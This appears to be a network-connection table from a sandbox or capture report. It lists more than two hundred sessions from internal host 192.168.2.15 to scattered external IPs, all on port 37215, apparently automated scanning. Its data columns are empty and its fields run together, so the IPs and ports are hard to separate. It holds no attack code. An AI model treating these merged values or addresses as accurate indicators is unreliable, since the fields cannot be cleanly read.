                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14900192.168.2.1542066178.241.240.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14901192.168.2.154213445.163.18.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14902192.168.2.1534470122.162.244.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14903192.168.2.1532930156.55.157.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14904192.168.2.1554166102.154.183.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14905192.168.2.1557542138.218.6.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14906192.168.2.1556082150.183.46.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14907192.168.2.1556746121.189.155.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14908192.168.2.1539100222.248.148.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14909192.168.2.156033437.161.86.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14910192.168.2.1540360222.219.111.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14911192.168.2.155068845.143.233.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14912192.168.2.1557600156.119.131.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14913192.168.2.1534224181.57.237.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14914192.168.2.1556062157.5.138.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14915192.168.2.1560442122.4.109.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14916192.168.2.1558976121.215.54.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14917192.168.2.1536368138.79.180.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14918192.168.2.153389845.146.3.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14919192.168.2.1544360157.245.33.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14920192.168.2.1534444102.123.212.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14921192.168.2.153776837.25.1.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14922192.168.2.154319031.8.221.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14923192.168.2.154049637.71.23.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14924192.168.2.1557056181.201.250.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14925192.168.2.1560734122.223.33.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14926192.168.2.153297672.61.166.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14927192.168.2.153360845.56.26.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14928192.168.2.1547692138.58.154.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14929192.168.2.1540792122.133.76.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14930192.168.2.1549922156.144.15.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14931192.168.2.1552782122.8.0.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14932192.168.2.1557628157.122.227.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14933192.168.2.1540226121.145.59.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14934192.168.2.1545108190.236.223.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14935192.168.2.1552910121.226.177.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14936192.168.2.1560344186.178.227.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14937192.168.2.1542016122.10.97.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14938192.168.2.1551408197.136.128.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14939192.168.2.1543150181.98.180.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14940192.168.2.154861637.144.53.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14941192.168.2.1550056121.77.14.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14942192.168.2.1546940181.188.158.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14943192.168.2.155858241.238.11.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14944192.168.2.154079868.56.170.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14945192.168.2.1553738190.8.14.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14946192.168.2.1559156138.10.189.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14947192.168.2.1535362222.180.35.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14948192.168.2.153804041.208.136.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14949192.168.2.1559376117.160.217.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14950192.168.2.1553226139.191.47.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14951192.168.2.1543002186.34.252.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14952192.168.2.155591032.205.16.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14953192.168.2.1550680190.47.48.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14954192.168.2.1553908122.80.228.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14955192.168.2.153705694.68.173.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14956192.168.2.1549808102.130.120.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14957192.168.2.1550080157.209.4.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14958192.168.2.154810837.197.62.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14959192.168.2.1533926197.155.97.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14960192.168.2.1543352138.81.227.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14961192.168.2.155951857.123.1.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14962192.168.2.155685031.56.250.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14963192.168.2.1559306190.106.46.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14964192.168.2.1536812102.224.53.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14965192.168.2.154008845.65.162.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14966192.168.2.1549324197.48.198.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14967192.168.2.154969894.34.52.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14968192.168.2.1534252190.108.54.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14969192.168.2.1556598157.117.29.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14970192.168.2.1556146121.29.84.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14971192.168.2.1538556157.154.68.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14972192.168.2.1555378198.47.155.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14973192.168.2.1548648122.175.76.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14974192.168.2.1534746122.15.186.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14975192.168.2.1560766156.221.186.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14976192.168.2.1535432181.87.153.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14977192.168.2.155954294.52.16.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14978192.168.2.1552830138.89.14.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14979192.168.2.154324245.223.196.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14980192.168.2.1532948122.22.214.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14981192.168.2.155963245.228.46.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14982192.168.2.155536245.75.23.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14983192.168.2.1547260122.46.188.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14984192.168.2.1533420138.219.142.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14985192.168.2.1542000122.150.129.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14986192.168.2.154202037.88.229.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14987192.168.2.1540686181.55.254.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14988192.168.2.154903482.114.46.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14989192.168.2.1547710222.213.59.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14990192.168.2.154355494.217.226.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14991192.168.2.1539710156.223.168.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14992192.168.2.154734494.24.119.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14993192.168.2.153311894.2.142.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14994192.168.2.155488845.114.103.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14995192.168.2.155620841.188.66.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14996192.168.2.1536352190.12.196.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14997192.168.2.153979231.233.194.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14998192.168.2.1552224186.63.235.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14999192.168.2.1560542122.179.180.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15000192.168.2.153349831.250.41.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15001192.168.2.1542398157.21.180.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15002192.168.2.1535938197.214.48.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15003192.168.2.1539956157.151.75.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15004192.168.2.1560098187.210.134.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15005192.168.2.154635245.169.253.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15006192.168.2.155966237.59.196.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15007192.168.2.1537072197.4.179.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15008192.168.2.1551366102.9.130.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15009192.168.2.1537578190.16.231.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15010192.168.2.1541356222.224.205.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15011192.168.2.1539508102.28.144.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15012192.168.2.1549818157.224.141.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15013192.168.2.153352245.212.171.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15014192.168.2.1547090197.214.231.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15015192.168.2.1542254138.208.148.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15016192.168.2.1534016222.54.91.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15017192.168.2.1545072156.155.114.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15018192.168.2.1554628124.22.104.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15019192.168.2.153907450.15.214.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15020192.168.2.154834494.232.159.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15021192.168.2.154848445.54.138.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15022192.168.2.154792045.247.101.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15023192.168.2.1560932121.137.197.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15024192.168.2.1545262121.173.130.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15025192.168.2.1549194138.115.44.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15026192.168.2.1543354121.236.148.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15027192.168.2.153589831.80.29.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15028192.168.2.153579894.251.228.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15029192.168.2.155228245.63.32.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15030192.168.2.1556334156.253.115.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15031192.168.2.1538636181.187.194.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15032192.168.2.155182641.68.227.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15033192.168.2.1559904197.161.100.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15034192.168.2.1547840157.17.2.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15035192.168.2.1560706122.121.120.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15036192.168.2.1538846199.16.230.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15037192.168.2.154081031.230.121.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15038192.168.2.1548666222.155.241.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15039192.168.2.1545528102.166.163.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15040192.168.2.155202645.146.14.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15041192.168.2.1552236222.178.90.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15042192.168.2.155204659.24.223.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15043192.168.2.155982631.126.14.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15044192.168.2.1553012181.230.162.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15045192.168.2.1546264186.120.80.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15046192.168.2.155160894.192.67.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15047192.168.2.1540268190.186.231.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15048192.168.2.1554242222.137.46.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15049192.168.2.1540418190.66.94.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15050192.168.2.1544682186.215.29.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15051192.168.2.1536798121.217.138.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15052192.168.2.1536716170.108.180.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15053192.168.2.1560940186.172.207.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15054192.168.2.1549668156.203.207.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15055192.168.2.154956085.167.8.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15056192.168.2.1540690102.62.57.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15057192.168.2.154848641.32.64.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15058192.168.2.1554002222.156.121.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15059192.168.2.1542148186.153.28.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15060192.168.2.1548002181.35.234.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15061192.168.2.1547036186.69.204.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15062192.168.2.1556594122.252.225.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15063192.168.2.1546818138.124.247.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15064192.168.2.154296631.40.173.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15065192.168.2.1554418122.153.129.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15066192.168.2.1546004121.148.49.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15067192.168.2.1548850122.17.229.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15068192.168.2.1559184197.170.197.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15069192.168.2.154073294.85.128.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15070192.168.2.1547890121.204.232.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15071192.168.2.1547836157.145.148.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15072192.168.2.153938231.129.207.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15073192.168.2.155973294.29.120.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15074192.168.2.1559336122.33.195.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15075192.168.2.1546954157.70.61.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15076192.168.2.1538808190.99.66.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15077192.168.2.1537318206.222.202.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15078192.168.2.1540382186.206.177.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15079192.168.2.1544726121.52.86.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15080192.168.2.1533010102.173.140.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15081192.168.2.154973837.179.137.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15082192.168.2.1549440121.20.203.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15083192.168.2.154098494.11.5.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15084192.168.2.154289031.107.227.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15085192.168.2.1549180186.138.188.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15086192.168.2.156000245.0.192.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15087192.168.2.1546210122.6.17.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15088192.168.2.154726845.127.234.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15089192.168.2.155416841.94.195.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15090192.168.2.153780837.63.15.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15091192.168.2.1554502109.53.246.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15092192.168.2.153904661.130.126.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15093192.168.2.154885441.234.161.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15094192.168.2.155326437.205.249.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15095192.168.2.1559484186.171.200.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15096192.168.2.1550492157.147.39.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15097192.168.2.1537754190.11.194.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15098192.168.2.1538188122.88.8.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15099192.168.2.1553578122.34.80.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15100192.168.2.155857864.221.187.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15101192.168.2.154703641.110.243.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15102192.168.2.1552136181.82.165.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15103192.168.2.1559632190.217.228.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15104192.168.2.1548672156.189.79.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15105192.168.2.1546752102.119.196.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15106192.168.2.1548302102.193.23.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15107192.168.2.1553698181.99.166.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15108192.168.2.1557418181.78.254.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15109192.168.2.156007037.81.225.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15110192.168.2.155622645.157.172.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15111192.168.2.154997831.91.204.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15112192.168.2.155685441.123.189.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15113192.168.2.1535052121.227.182.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15114192.168.2.153980845.164.252.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15115192.168.2.1539284181.211.78.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15116192.168.2.1538580197.46.49.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15117192.168.2.1549708208.16.131.25537215
                                              TimestampBytes transferredDirectionData


